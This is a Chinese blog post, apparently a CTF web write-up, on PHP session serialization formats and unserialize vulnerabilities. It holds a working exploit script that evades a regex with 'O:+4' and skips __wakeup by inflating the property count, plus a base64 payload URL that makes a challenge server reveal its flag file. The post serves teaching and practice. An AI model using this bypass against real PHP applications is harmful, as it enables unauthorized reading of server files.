CTFweb篇-反序列化和SESSION(一)

最新推荐文章于 2024-05-03 16:18:54 发布
最新推荐文章于 2024-05-03 16:18:54 发布
阅读量1k 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/107896618
版权

前面讲到过一点SESSION,这里要继续说一点

SESSION的几种形式

在这里插入图片描述
这里是binary
session的形成方法可以在php.ini中设置。默认是php(可能是php_serialize)
例子:
在这里插入图片描述

php形式:
在这里插入图片描述
php_serialize形式:
在这里插入图片描述
php_binary:
在这里插入图片描述

ini_set()

ini_set ( string $varname , string $newvalue )
在配置文件中设置配置的值

ini_set('session.serialize_handles','php')

session_start()

用于初始化session数据,我们在使用session时,经常要使用到_SESSION变量,_SESSION是服务器端的cookie,相当一个大数组(浏览器关闭前,和session销毁前).
在用这个函数后,session值会被反序列化,然后就可以用_session数组变量。

反序列化和序列化

什么是序列化和反序列化

序列化就是将object或者array转化为字符串
反序列化就是将字符串转化为object和array

主要讨论反序列化

序列化格式

例如:(以php_serialize为例)
数组型:
在这里插入图片描述
a:代表array
1:数组里面有1个键值对
s:string
4就是后面name的长度
对象型:
在这里插入图片描述
O:class
4:就是对象名的长度
Demo:对象名
Demofile:就是Demo下的一个变量。
1:属性个数。
s:string
注意s后面的长度是10,不是8,因为Demo前后都有个空格,这是url编码造成的。
其它具体的我也没有去了解了,需要了再说。

反序列化常用漏洞

绕过匹配
在这里插入图片描述
分析代码,无非就是做两个简单绕过
1、绕过正则
这里可以通过O:4变为O:+4的方法进行篡改,在php中,对这种篡改默认正确
2、绕过$this->file != ‘index.php’
php中可以将代表属性个数的数值改变,因为php中规定只要反序列化这个数值不同,当__wakeup函数不触发。

综上:这道题就可以通过建立f14g.php的Demo对象来进行:

<?php
class Demo {
 private $file = 'index.php';
 public function __construct($file) {
 $this->file = $file;
 }
 function __destruct() {
 echo @highlight_file($this->file, true);
 }
 function __wakeup() {
 if ($this->file != 'index.php') {
 //the secret is in the fl4g.php
 $this->file = 'index.php';
 }
 }
}
$flag = new Demo('fl4g.php');
$flag = serialize($flag);
$flag = str_replace('O:4', 'O:+4',$flag); // 绕过正则
$flag = str_replace(':1:', ':2:' ,$flag); //绕过
wakeup 函数
echo base64_encode($flag); //对参数进行 base 编码
?>

得到TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

得到payload:
http://220.249.52.133:50565/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
在这里插入图片描述
这里显示flag是因为最后对象被销毁,触发了__destruct()函数

总结

反序列化多用于魔术方法中。
应该了解到何时__wakeup函数不会触发

weixin_44597701
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF从入门到提升(十三)文件包含session及例题详解
anquanniu的博客
09-12 2729
具体场景——session 我们可以查一下手册,看看这个参数是默认开启: 举栗子 ​ 通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。 这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,file...
CTFweb-Session包含
weixin_44597701的博客
08-07 3828
什么是Session Session就是保存在服务器的文本文件。 默认情况下,PHP.ini 中设置的 SESSION 保存方式是 files(session.save_handler = files),即使用读写文件的方式保存 SESSION 数据,而 SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列之后的 SESSIO
2024年网安最新ctfshow-WEB-web11( 利用session绕过登录验证)_ctfshow web11
2401_84297796的博客
05-03 354
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功。
ctfshow web入门 序列 263
m0_64815693的博客
04-08 1610
ctfshow web入门 序列 263
【CTF】buuctf web(三)——PHP序列序列
m0_52923241的博客
08-04 1730
[极客大挑战 2019]PHP 题目类型:序列序列 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
Session的常用方法
qq_44765568的博客
09-20 2356
1.request.getSession(true) 若存在会话就返回一个会话,不存在就创建一个. 返回值为HttpSession session.invalidate(); 这个方法就是将session中的变量全部清空 session.setAttribute(key,value); 设置属性 key ,value session.getAttribute(key); 获取key的值 5.session.removeAttribute(key); 删除属性为key的值 6.
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session序列
u013119911的博客
06-30 1531
点开就是源代码,直接进行代码审计
第38天:WEB漏洞-序列之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-序列之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的序列漏洞。序列漏洞是由于程序在处理序列数据时没有充分验证输入,从而允许攻击者构造...
C#之JSON序列序列
最新发布
05-09
C#之JSON序列序列
深入解析PHP中SESSION序列机制
10-20
主要介绍了PHP中SESSION序列机制的相关资料,文中介绍的非常相信,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
python序列序列和异常处理笔记.doc
10-01
python序列序列和异常处理笔记
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
[BUUCTF] 集训第五天
Dannie01的博客
10-02 505
[MRCTF2020]PYWebsite 查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829
[原题复现]2018HCTF WEB admin(session伪造、unicode漏洞、条件竞争)
笑花大王
02-09 2396
简介 原题复现:https://github.com/woadsl1234/HCTF2018_admin 考察知识点:session伪造、unicode漏洞、条件竞争 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 第一个方法: 打开界面先查看了源码提示 you are not admin 我不是ad...
记一道CTF序列
Peithon的博客
05-28 9581
0x00 使用burpsuite抓包,在URL上发现有用信息 发现key=123对应一个hash值,该hash的值通过md5解密得到kkkkkk01123,如果我们不是123那么就可以get到flag,构造kkkkkk01456,将其MD5加密,得到2a5414055268d6f1f82288af38e5ce4e,将key和hash替换,构造 index.php?key=456&amp;amp;h...
SESSION序列
qq_51553814的博客
10-28 300
前几天打省赛,遇到一个seesion序列的题,当时没做出来,今天复盘学习了一下,写个笔记 什么是SESSION 首先session是什么,就是一个会话控制,这样描述很肤浅,还得往更深的层次研究,这里是我学习的一个大佬的文章,讲的很透彻什么是session 大概流程就是,当你打开一个页面,php会先判断你有没有sessionid,没有就生成一个id,当你结束后会生成一个文件,当判断出你有id时,php会直接读取上回生成的文件,把里面的东西序列出来。这一套操作通常是用来,用户持续保持会话的,也就是用户退
南邮CTF web题目总结
热门推荐
超人学飞的日子
06-02 1万+
这几天写了南邮的web题目,都比较基础,但是对我这个小白来说还是收获蛮大的。可以借此总结一下web题的类型一,信息都藏在哪作为ctf题目,肯定是要有些提示的,这些提示有时会在题目介绍里说有时也会隐藏在某些地方。1,源代码,这是最最最常见的。2,http head头中,这个一般都会提下 ‘头’ 什么的。3,非常规提示,就比如这个:如果第一次做ctf题目,不知道还有这些套路,一般不会往这个方面想。二,...
【2022蓝帽杯】file_session && 浅入opcode
weixin_45751765的博客
07-28 1618
每次蓝帽的web总能让人坐牢事情太多(人也菜)断断续续磨了很长一段时间的东西。
ctfshow 序列
m0_62422842的博客
07-07 1699
涉及到的题目是web254~web266
如何使用protobuf-net进行序列序列
04-19
protobuf-net是一个用于序列序列的库,它是Google Protocol Buffers的一个.NET实现。下面是使用protobuf-net进行序列序列的步骤: 1. 定义消息结构:首先,你需要定义你的消息结构,可以使用.proto文件来描述消息结构,然后使用protobuf编译器生成对应的C#类。 2. 安装protobuf-net库:在你的项目中安装protobuf-net库,可以通过NuGet包管理器或手动下载安装。 3. 序列对象:使用protobuf-net库的Serializer.Serialize方法将对象序列为字节数组。例如: ```csharp using (var stream = new MemoryStream()) { Serializer.Serialize(stream, yourObject); byte[] bytes = stream.ToArray(); } ``` 4. 序列对象:使用protobuf-net库的Serializer.Deserialize方法将字节数组序列为对象。例如: ```csharp using (var stream = new MemoryStream(bytes)) { YourObjectType deserializedObject = Serializer.Deserialize<YourObjectType>(stream); } ``` 注意:在进行序列时,需要提供目标对象的类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值